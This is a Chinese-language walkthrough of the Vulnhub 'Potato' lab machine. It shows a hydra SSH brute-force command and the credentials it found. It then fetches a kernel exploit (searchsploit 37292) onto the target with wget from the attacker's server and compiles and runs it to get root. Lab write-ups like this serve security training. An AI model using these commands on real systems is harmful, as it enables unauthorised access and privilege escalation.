信息搜集

设备发现

扫描端口

综合扫描

开放了80端口的HTTP服务和7120端口的SSH服务

目录扫描

扫描目录

看看这个info.php，发现只有php的版本信息，没有可以利用的注入点

 SSH突破

hydra 爆破

考虑到 7120 端口是 ssh 服务，尝试利用 hydra 进行 ssh 爆破，得到用户名：potato 密码：letmein

hydra -l potato -P top1000.txt -V ssh://192.168.88.138:7120

ssh渗透提权

用拿到 ssh 用户名和密码，登录 ssh 

id查看发现是一个普通用户；uname -a查看发现ubuntu的版本很老，只有3.13.0

查看 Linux 内核信息，搜索后发现存在 exp，也可以searchsploit ubuntu 3.13.3，使用第一个漏洞进行攻击

使用该漏洞，

将漏洞传到靶机上，这里我们在kali上建立apache服务器，让目标主机通过网络将漏洞下载到本机上

service apache2 start   ---------开启服务器ss -tunlp                       ----------查看开启端口

将漏洞下载到服务器目录下

cd /var/www/html
searchsploit -m 37292 

使用目标靶机下载服务器上的漏洞

wget http://192.168.88.128/37292.c 

运行脚本提权

gcc 37292.c -o exp ----------编译脚本
chmod +777 exp -----------更改权限
./exp -------------执行脚本

提高交互性并且拿到root权限

找到flag，拿下

参考博客：

Potato靶机测试-CSDN博客

Vulnhub靶机实战-POTATO-WP_维梓-的博客-CSDN博客